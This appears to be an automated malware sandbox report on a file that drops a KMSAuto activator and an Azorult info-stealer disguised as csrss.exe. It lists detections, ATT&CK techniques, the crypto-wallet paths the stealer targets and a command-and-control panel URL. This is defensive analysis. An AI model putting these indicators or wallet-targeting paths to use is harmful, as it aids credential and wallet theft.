              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\csrss.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Amcache.hve.4.drBinary or memory string: c:\users\user\desktop\procexp.exe
              Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.4.drBinary or memory string: procexp.exe

              Stealing of Sensitive Information

              barindex
              Yara detected Azorult
              Source: Yara matchFile source: 1.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.285901899.0000000000401000.00000020.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 5224, type: MEMORYSTR
              Yara detected Azorult Info Stealer
              Source: Yara matchFile source: 1.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.285901899.0000000000401000.00000020.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 5224, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: csrss.exeString found in binary or memory: electrum.dat
              Source: csrss.exeString found in binary or memory: %appdata%\Electrum\wallets\
              Source: csrss.exeString found in binary or memory: %APPDATA%\Jaxx\Local Storage\
              Source: csrss.exeString found in binary or memory: %APPDATA%\Exodus\
              Source: csrss.exeString found in binary or memory: %APPDATA%\Jaxx\Local Storage\
              Source: csrss.exeString found in binary or memory: %APPDATA%\Ethereum\keystore\
              Source: csrss.exeString found in binary or memory: %APPDATA%\Exodus\
              Source: csrss.exeString found in binary or memory: %APPDATA%\Ethereum\keystore\
              Source: csrss.exeString found in binary or memory: %APPDATA%\Ethereum\keystore\
              Source: csrss.exeString found in binary or memory: %appdata%\Electrum-LTC\wallets\

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts2
              Command and Scripting Interpreter              		Path Interception12
              Process Injection              		12
              Masquerading              		1
              Credential API Hooking              		531
              Security Software Discovery              		Remote Services1
              Credential API Hooking              		Exfiltration Over Other Network Medium1
              Encrypted Channel              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts12
              Virtualization/Sandbox Evasion              		LSASS Memory12
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol1
              Archive Collected Data              		Exfiltration Over Bluetooth2
              Ingress Tool Transfer              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
              Disable or Modify Tools              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin Shares1
              Data from Local System              		Automated Exfiltration3
              Non-Application Layer Protocol              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)12
              Process Injection              		NTDS1
              Remote System Discovery              		Distributed Component Object ModelInput CaptureScheduled Transfer113
              Application Layer Protocol              		SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Obfuscated Files or Information              		LSA Secrets2
              File and Directory Discovery              		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials214
              System Information Discovery              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 834745 Sample: ADDCDF9E3BAC722442FB269492F... Startdate: 25/03/2023 Architecture: WINDOWS Score: 100 43 Snort IDS alert for network traffic 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 Multi AV Scanner detection for dropped file 2->47 49 8 other signatures 2->49 8 ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe 15 8 2->8         started        process3 file4 35 C:\Users\user\AppData\Roaming\csrss.exe, PE32 8->35 dropped 37 C:\Program Files (x86)\...\KMSAuto Net.exe, PE32 8->37 dropped 39 C:\Users\user\AppData\Local\...\temp_0.tmp, Microsoft 8->39 dropped 51 Drops PE files with benign system names 8->51 12 csrss.exe 12 8->12         started        16 KMSAuto Net.exe 3 8->16         started        signatures5 process6 dnsIp7 41 f0355889.xsph.ru 141.8.192.151, 49695, 80 SPRINTHOSTRU Russian Federation 12->41 53 Antivirus detection for dropped file 12->53 55 Multi AV Scanner detection for dropped file 12->55 57 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 12->57 59 4 other signatures 12->59 18 WerFault.exe 24 9 12->18         started        21 cmd.exe 1 16->21         started        23 cmd.exe 2 16->23         started        25 cmd.exe 2 16->25         started        signatures8 process9 file10 33 C:\ProgramData\Microsoft\...\Report.wer, Unicode 18->33 dropped 27 conhost.exe 21->27         started        29 conhost.exe 23->29         started        31 conhost.exe 25->31         started        process11

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe57%ReversingLabsWin32.Trojan.Strictor
              ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe45%VirustotalBrowse

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\csrss.exe100%AviraTR/Crypt.XPACK.Gen
              C:\Users\user\AppData\Roaming\csrss.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\$inst\temp_0.tmp100%Joe Sandbox ML
              C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe100%Joe Sandbox ML
              C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe71%ReversingLabsWin32.Hacktool.AutoKMS
              C:\Users\user\AppData\Roaming\csrss.exe67%ReversingLabsWin32.Spyware.Azorult

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              1.0.csrss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.2.csrss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              https://dotbit.me/a/0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.founder.c0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/~0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/90%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://www.founder.com.cn/cnl0%URL Reputationsafe
              http://www.fonts.comn0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.sajatypeworks.comd0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/Y0a0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/Z0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/Z0%URL Reputationsafe
              http://ocsp.thawte.com00%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/M0%URL Reputationsafe
              http://www.tiro.comn0%URL Reputationsafe
              http://www.fontbureau.coma0%URL Reputationsafe
              http://www.fonts.comW0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.founder.com.cn/cn/0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/b0%URL Reputationsafe
              http://www.sandoll.co.krA0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/ito0%Avira URL Cloudsafe
              http://www.founder.c#0%Avira URL Cloudsafe
              http://forum.ru-board.comMarathiWindows0%Avira URL Cloudsafe
              https://index.from.sh/pages/game.html0%Avira URL Cloudsafe
              https://index.from.sh/pages/game.html0%VirustotalBrowse
              http://www.jiyu-kobo.co.jp/ito0%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              f0355889.xsph.ru
              		141.8.192.151
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://f0355889.xsph.ru/Panel/index.phpfalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://forum.ru-board.comKMSAuto Net.exe.0.drfalse
                    		high
                    http://www.fontbureau.com/designersGKMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://cp.sprinthost.ru/customer/ips/listcsrss.exe, 00000001.00000003.255564669.0000000002E04000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000001.00000003.274376515.0000000002E0C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000001.00000003.255583166.0000000002E08000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        https://index.from.sh/pages/game.htmlcsrss.exe, 00000001.00000003.255564669.0000000002E04000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000001.00000003.255546682.0000000002E1C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000001.00000003.255583166.0000000002E08000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000001.00000003.274427424.0000000002E00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000001.00000003.255405907.0000000002E04000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000001.00000003.255463802.0000000002E0C000.00000004.00001000.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.fontbureau.com/designers/?KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.founder.com.cn/cn/bTheKMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers?KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://ip-api.com/jsoncsrss.exe, csrss.exe, 00000001.00000002.285901899.0000000000401000.00000020.00000001.01000000.00000004.sdmpfalse
                              		high
                              https://dotbit.me/a/csrss.exe, csrss.exe, 00000001.00000002.285901899.0000000000401000.00000020.00000001.01000000.00000004.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.tiro.comKMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.265177397.0000000005D1B000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designersKMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.founder.cKMSAuto Net.exe, 00000002.00000003.267280152.0000000005D04000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.267584430.0000000005D09000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.goodfont.co.krKMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/~KMSAuto Net.exe, 00000002.00000003.269268617.0000000005D04000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.sajatypeworks.comKMSAuto Net.exe, 00000002.00000003.264600737.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264730443.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264661332.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264634623.0000000005D23000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264512674.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264465536.0000000005D23000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264393524.0000000005D22000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264689563.0000000005D23000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264764177.0000000005D24000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/9KMSAuto Net.exe, 00000002.00000003.269268617.0000000005D04000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.typography.netDKMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cn/cTheKMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/staff/dennis.htmKMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://fontfabrik.comKMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.265139659.0000000005D1B000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.265177397.0000000005D1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://crl.thawte.com/ThawteTimestampingCA.crl0ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249938903.0000000002217000.00000004.00001000.00020000.00000000.sdmp, ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.drfalse
                                  		high
                                  http://www.founder.com.cn/cnlKMSAuto Net.exe, 00000002.00000003.267704547.0000000005D0B000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.267280152.0000000005D04000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.267584430.0000000005D09000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://habrahabr.ru/post/192986/#KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.drfalse
                                    		high
                                    http://www.fonts.comnKMSAuto Net.exe, 00000002.00000003.264689563.0000000005D1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/DPleaseKMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.youtube.com/watch?v=niXf0ov0S8IKMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.drfalse
                                      		high
                                      https://keepass.info/1020KMSAutoADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exefalse
                                        		high
                                        http://forum.ru-board.comMarathiWindowsKMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.fonts.comKMSAuto Net.exe, 00000002.00000003.264730443.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264730443.0000000005D1B000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.sandoll.co.krKMSAuto Net.exe, 00000002.00000003.266039290.0000000005D09000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.sajatypeworks.comdKMSAuto Net.exe, 00000002.00000003.264600737.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264730443.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264661332.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264634623.0000000005D23000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264512674.0000000005D24000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264465536.0000000005D23000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264393524.0000000005D22000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264689563.0000000005D23000.00000004.00000020.00020000.00000000.sdmp, KMSAuto Net.exe, 00000002.00000003.264764177.0000000005D24000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.urwpp.deDPleaseKMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.zhongyicts.com.cnKMSAuto Net.exe, 00000002.00000002.520333234.0000000006F12000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
